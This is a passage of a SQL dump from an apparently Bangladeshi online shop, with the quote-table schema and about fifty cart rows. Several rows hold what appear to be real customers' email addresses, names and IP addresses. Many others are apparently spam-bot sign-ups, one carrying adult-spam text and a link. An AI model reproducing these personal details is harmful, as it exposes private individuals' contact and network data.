  `applied_rule_ids` varchar(255) DEFAULT NULL COMMENT 'Applied Rule Ids',
  `reserved_order_id` varchar(64) DEFAULT NULL COMMENT 'Reserved Order ID',
  `password_hash` varchar(255) DEFAULT NULL COMMENT 'Password Hash',
  `coupon_code` varchar(255) DEFAULT NULL COMMENT 'Coupon Code',
  `global_currency_code` varchar(255) DEFAULT NULL COMMENT 'Global Currency Code',
  `base_to_global_rate` decimal(20,4) DEFAULT NULL COMMENT 'Base To Global Rate',
  `base_to_quote_rate` decimal(20,4) DEFAULT NULL COMMENT 'Base To Quote Rate',
  `customer_taxvat` varchar(255) DEFAULT NULL COMMENT 'Customer Taxvat',
  `customer_gender` varchar(255) DEFAULT NULL COMMENT 'Customer Gender',
  `subtotal` decimal(20,4) DEFAULT NULL COMMENT 'Subtotal',
  `base_subtotal` decimal(20,4) DEFAULT NULL COMMENT 'Base Subtotal',
  `subtotal_with_discount` decimal(20,4) DEFAULT NULL COMMENT 'Subtotal With Discount',
  `base_subtotal_with_discount` decimal(20,4) DEFAULT NULL COMMENT 'Base Subtotal With Discount',
  `is_changed` int(10) UNSIGNED DEFAULT NULL COMMENT 'Is Changed',
  `trigger_recollect` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Trigger Recollect',
  `ext_shipping_info` text DEFAULT NULL COMMENT 'Ext Shipping Info',
  `gift_message_id` int(11) DEFAULT NULL COMMENT 'Gift Message ID',
  `is_persistent` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Is Quote Persistent'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Quote';

--
-- Dumping data for table `quote`
--

INSERT INTO `quote` (`entity_id`, `store_id`, `created_at`, `updated_at`, `converted_at`, `is_active`, `is_virtual`, `is_multi_shipping`, `items_count`, `items_qty`, `orig_order_id`, `store_to_base_rate`, `store_to_quote_rate`, `base_currency_code`, `store_currency_code`, `quote_currency_code`, `grand_total`, `base_grand_total`, `checkout_method`, `customer_id`, `customer_tax_class_id`, `customer_group_id`, `customer_email`, `customer_prefix`, `customer_firstname`, `customer_middlename`, `customer_lastname`, `customer_suffix`, `customer_dob`, `customer_note`, `customer_note_notify`, `customer_is_guest`, `remote_ip`, `applied_rule_ids`, `reserved_order_id`, `password_hash`, `coupon_code`, `global_currency_code`, `base_to_global_rate`, `base_to_quote_rate`, `customer_taxvat`, `customer_gender`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `is_changed`, `trigger_recollect`, `ext_shipping_info`, `gift_message_id`, `is_persistent`) VALUES
(1, 1, '2020-08-08 01:45:17', '2020-08-17 10:14:10', NULL, 0, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 36.3900, 36.3900, NULL, 1, 3, 1, 'roni_cost@example.com', NULL, 'Veronica', NULL, 'Costello', NULL, '1973-12-15 00:00:00', NULL, 1, 0, NULL, '1', '000000001', NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, '2', 29.0000, 29.0000, 29.0000, 29.0000, 1, 0, NULL, NULL, 0),
(2, 1, '2020-08-08 01:45:20', '2020-08-17 10:39:51', NULL, 0, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 39.6400, 39.6400, NULL, 1, 3, 1, 'roni_cost@example.com', NULL, 'Veronica', NULL, 'Costello', NULL, '1973-12-15 00:00:00', NULL, 1, 0, NULL, '1', '000000002', NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, '2', 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(3, 1, '2020-08-17 11:08:13', '2020-08-17 11:08:13', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 514.4000, 514.4000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '192.168.10.249', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 643.0000, 643.0000, 514.4000, 514.4000, 1, 0, NULL, NULL, 0),
(4, 1, '2020-08-22 05:07:19', '2020-08-22 05:12:08', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '192.168.10.249', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(5, 1, '2020-08-22 07:11:06', '2020-08-22 07:12:49', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '192.168.10.249', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(6, 1, '2020-08-22 08:24:12', '2020-08-22 08:24:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 2, NULL, 1, 'masum2mina@gmail.com', NULL, 'masum', NULL, 'mina', NULL, NULL, NULL, 1, 0, '192.168.10.249', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(7, 1, '2020-08-23 04:25:11', '2020-08-23 05:43:24', NULL, 0, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 192.2000, 192.2000, 'guest', NULL, 3, 0, 'sudipjeet.cse@gmail.com', NULL, 'Sudip', NULL, 'Dhali', NULL, NULL, NULL, 1, 1, '192.168.10.1', '2,3', '000000003', NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(8, 1, '2020-08-23 04:29:53', '2020-08-23 04:30:10', NULL, 1, 0, 0, 3, 3.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 567.2000, 567.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '192.168.10.1', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 709.0000, 709.0000, 567.2000, 567.2000, 1, 0, NULL, NULL, 0),
(9, 1, '2020-08-23 09:50:53', '2020-08-23 09:50:53', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 336.8000, 336.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '192.168.10.1', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 421.0000, 421.0000, 336.8000, 336.8000, 1, 0, NULL, NULL, 0),
(10, 1, '2020-08-24 01:47:45', '2020-08-24 01:49:36', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, 3, 3, 1, 'developer@echosystech.com', NULL, 'developer', NULL, 'developer', NULL, NULL, NULL, 1, 0, '192.168.10.1', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(11, 1, '2020-08-26 03:08:10', '2020-08-26 03:08:10', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 514.4000, 514.4000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '192.168.10.1', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 643.0000, 643.0000, 514.4000, 514.4000, 1, 0, NULL, NULL, 0),
(12, 1, '2020-08-26 06:10:59', '2020-08-26 06:10:59', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 4, NULL, 1, 'sudipjeet.cse@gmail.com', NULL, 'Sudip', NULL, 'Dhali', NULL, NULL, NULL, 1, 0, '192.168.10.1', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(13, 1, '2020-09-14 05:34:55', '2020-09-14 05:34:55', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 5, NULL, 1, 'e.estdev@gmail.com', NULL, 'aktar', NULL, 'uzzaman', NULL, NULL, NULL, 1, 0, '192.168.10.1', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(14, 1, '2021-04-13 04:19:44', '2021-04-13 04:29:21', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '118.179.43.20', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(15, 1, '2021-04-13 05:43:32', '2021-04-13 05:45:54', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.134.28.38', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(16, 1, '2021-04-13 05:52:15', '2021-04-13 05:53:06', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 519.4000, 519.4000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.87.214.212', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 643.0000, 643.0000, 514.4000, 514.4000, 1, 0, NULL, NULL, 0),
(17, 1, '2021-04-13 12:12:36', '2021-04-13 12:15:38', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.87.214.205', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(18, 1, '2021-04-14 04:55:19', '2021-04-14 04:56:27', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 519.4000, 519.4000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.87.214.205', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 643.0000, 643.0000, 514.4000, 514.4000, 1, 0, NULL, NULL, 0),
(19, 1, '2021-04-21 10:04:04', '2021-04-21 10:07:53', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, 6, 3, 1, 'tanmoybasak307@yahoo.com', NULL, 'Tanmoy', NULL, 'Basak', NULL, NULL, NULL, 1, 0, '103.204.211.132', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(20, 1, '2021-04-26 09:11:36', '2021-04-26 09:11:36', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 7, NULL, 1, 'khanmrh@gmail.com', NULL, 'Raquibul', NULL, 'Hasan', NULL, NULL, NULL, 1, 0, '203.76.99.202', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(21, 1, '2021-04-26 22:18:01', '2021-04-26 22:18:01', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 8, NULL, 1, 'totewinthropbirrueta@gmail.com', NULL, 'XtwJabezvGfkhEZO', NULL, 'QGqNOrMu', NULL, NULL, NULL, 1, 0, '12.188.54.30', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(22, 1, '2021-04-29 01:27:50', '2021-04-29 01:27:50', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 9, NULL, 1, 'knowable1975finnfinn@gmail.com', NULL, 'klPevVOdyH', NULL, 'fVLGpOvEQUdTI', NULL, NULL, NULL, 1, 0, '110.78.186.62', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(23, 1, '2021-05-02 11:04:56', '2021-05-02 11:04:56', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 10, NULL, 1, 'sarkar.sajib@rocketmail.com', NULL, 'Shibashis', NULL, 'Sarkar', NULL, NULL, NULL, 1, 0, '103.204.211.132', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(24, 1, '2021-05-03 08:28:41', '2021-05-03 08:39:36', NULL, 1, 0, 0, 2, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 771.2000, 771.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.204.211.132', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 964.0000, 964.0000, 771.2000, 771.2000, 1, 0, NULL, NULL, 0),
(25, 1, '2021-05-11 05:11:40', '2021-05-11 05:11:40', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 514.4000, 514.4000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.220.207.22', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 643.0000, 643.0000, 514.4000, 514.4000, 1, 0, NULL, NULL, 0),
(26, 1, '2021-05-12 07:43:48', '2021-05-12 07:43:48', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 11, NULL, 1, 'simonmccarthy9355@gmail.com', NULL, 'nWSNrkPZuAcOfpgq', NULL, 'xtZURlunVQBMGIYC', NULL, NULL, NULL, 1, 0, '187.189.52.26', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(27, 1, '2021-05-22 07:32:18', '2021-05-22 07:32:18', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 514.4000, 514.4000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.87.214.219', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 643.0000, 643.0000, 514.4000, 514.4000, 1, 0, NULL, NULL, 0),
(28, 1, '2021-05-27 14:47:15', '2021-05-27 14:47:15', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 12, NULL, 1, 'subcomponentraleigh@gmail.com', NULL, 'haIAqWnXtECNmU', NULL, 'NzrlwoWu', NULL, NULL, NULL, 1, 0, '14.232.85.50', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(29, 1, '2021-06-05 17:43:16', '2021-06-05 17:43:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 13, NULL, 1, 'paulwoods8093@gmail.com', NULL, 'HJRIyvoPYj', NULL, 'lOXbPTpqBgDuH', NULL, NULL, NULL, 1, 0, '112.31.63.89', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(30, 1, '2021-06-07 04:10:03', '2021-06-07 04:12:53', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 59.0000, 59.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '118.179.43.20', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(31, 1, '2021-06-08 10:57:44', '2021-06-08 12:03:32', NULL, 1, 0, 0, 2, 5.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 567.4000, 567.4000, NULL, 14, 3, 1, 'masum4mina@gmail.com', NULL, 'Masum', NULL, 'Mina', NULL, NULL, NULL, 1, 0, '203.76.99.202', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 678.0000, 678.0000, 542.4000, 542.4000, 1, 0, NULL, NULL, 0),
(32, 1, '2021-06-09 03:59:26', '2021-06-09 03:59:53', NULL, 1, 0, 0, 2, 5.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 1917.6000, 1917.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '203.76.99.202', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 2397.0000, 2397.0000, 1917.6000, 1917.6000, 1, 0, NULL, NULL, 0),
(33, 1, '2021-06-09 06:43:12', '2021-06-09 06:43:12', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.87.214.219', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(34, 1, '2021-06-09 08:39:09', '2021-06-09 08:58:03', NULL, 1, 0, 0, 1, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 1038.8000, 1038.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '203.76.99.202', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 1286.0000, 1286.0000, 1028.8000, 1028.8000, 1, 0, NULL, NULL, 0),
(35, 1, '2021-06-09 11:59:41', '2021-06-09 11:59:41', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '203.76.99.202', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(36, 1, '2021-06-12 02:59:35', '2021-06-12 02:59:35', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 15, NULL, 1, 'jb5474452@gmail.com', NULL, 'qutcNimHO', NULL, 'MwyDmKiaHTIOX', NULL, NULL, NULL, 1, 0, '189.240.39.243', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(37, 1, '2021-06-15 12:31:32', '2021-06-15 12:32:12', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 519.4000, 519.4000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '118.179.43.20', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 643.0000, 643.0000, 514.4000, 514.4000, 1, 0, NULL, NULL, 0),
(38, 1, '2021-06-16 06:45:35', '2021-06-16 06:46:13', NULL, 1, 0, 0, 1, 6.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 1123.2000, 1123.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '119.30.39.138', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 1404.0000, 1404.0000, 1123.2000, 1123.2000, 1, 0, NULL, NULL, 0),
(39, 1, '2021-06-16 12:03:49', '2021-06-16 12:04:19', NULL, 1, 0, 0, 2, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 444.0000, 444.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.204.211.132', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 555.0000, 555.0000, 444.0000, 444.0000, 1, 0, NULL, NULL, 0),
(40, 1, '2021-06-27 11:43:01', '2021-06-27 11:43:01', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 16, NULL, 1, 'fittsdot@gmail.com', NULL, 'krqXiWIGSyPdg', NULL, 'BmNxYDzqE', NULL, NULL, NULL, 1, 0, '61.167.105.194', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(41, 1, '2021-10-18 05:27:59', '2021-10-18 05:27:59', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 17, NULL, 1, 'lottiuxxuv72@gmail.com', NULL, 'YdRbfXyS', NULL, 'MUDvAOnBzXaQl', NULL, NULL, NULL, 1, 0, '45.224.105.52', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(42, 1, '2021-10-27 14:02:07', '2021-10-27 14:02:07', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 18, NULL, 1, 'athenabsafd81@gmail.com', NULL, 'DbCQRaWizZvjfq', NULL, 'QYlyAUDO', NULL, NULL, NULL, 1, 0, '58.11.53.54', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(43, 1, '2021-11-06 09:04:50', '2021-11-06 09:04:50', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 19, NULL, 1, 'summersroger9@gmail.com', NULL, 'azovHOMJZ', NULL, 'XRTzsQtHMdKiU', NULL, NULL, NULL, 1, 0, '72.255.44.249', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(44, 1, '2021-11-20 19:00:26', '2021-11-20 19:00:26', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 20, NULL, 1, 'GaryMiller4A@gmail.com', NULL, 'oltPSJVnuNw', NULL, 'tkHZBvSOQc', NULL, NULL, NULL, 1, 0, '87.229.206.106', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(45, 1, '2021-11-22 09:55:18', '2021-11-22 09:55:18', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 21, NULL, 1, 'blairdaniella5@gmail.com', NULL, 'qyQsFGnrtKHjuAad', NULL, 'YfbJBPAONFdH', NULL, NULL, NULL, 1, 0, '98.124.36.64', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(46, 1, '2021-12-03 09:49:21', '2021-12-03 09:49:21', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 22, NULL, 1, 'BeatriceSutton385583@gmail.com', NULL, 'BfzVIZjGsCUKkHFw', NULL, 'FJkMHNWLaxnIuQ', NULL, NULL, NULL, 1, 0, '197.254.118.166', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(47, 1, '2021-12-21 02:49:22', '2021-12-21 02:49:22', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 23, NULL, 1, 'LloydJTrask@gmail.com', NULL, 'MCkQYKNi', NULL, 'AeGnZuHkQOEX', NULL, NULL, NULL, 1, 0, '222.75.242.198', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(48, 1, '2021-12-22 07:28:08', '2021-12-22 07:28:08', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 24, NULL, 1, 'RamiroGolubev247@gmail.com', NULL, 'wlHqsrnhJRpzgum', NULL, 'TZfcEIyoenazP', NULL, NULL, NULL, 1, 0, '64.19.81.102', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(49, 1, '2021-12-22 16:48:24', '2021-12-22 16:48:24', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '207.241.233.138', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(50, 1, '2021-12-31 16:38:38', '2021-12-31 16:38:38', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 25, NULL, 1, 'cava2563@gmail.com', NULL, 'GMpTAyvBchnlgr', NULL, 'ohqPnfsDvZrW', NULL, NULL, NULL, 1, 0, '110.169.32.5', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(51, 1, '2022-01-06 21:12:41', '2022-01-06 21:12:41', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 26, NULL, 1, 'markformel23.5.6@gmail.com', NULL, 'ChickH gets down and dirty - her id871 www.gooogle.com/ggg', NULL, 'SHE DESIRE YOU NOW 963', NULL, NULL, NULL, 1, 0, '77.221.152.210', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(52, 1, '2022-01-12 14:38:27', '2022-01-12 14:38:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 27, NULL, 1, 'haelliott7@gmail.com', NULL, 'yOvrUmVYzJ', NULL, 'JxUCaKTnyqzsfDAo', NULL, NULL, NULL, 1, 0, '14.232.7.37', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
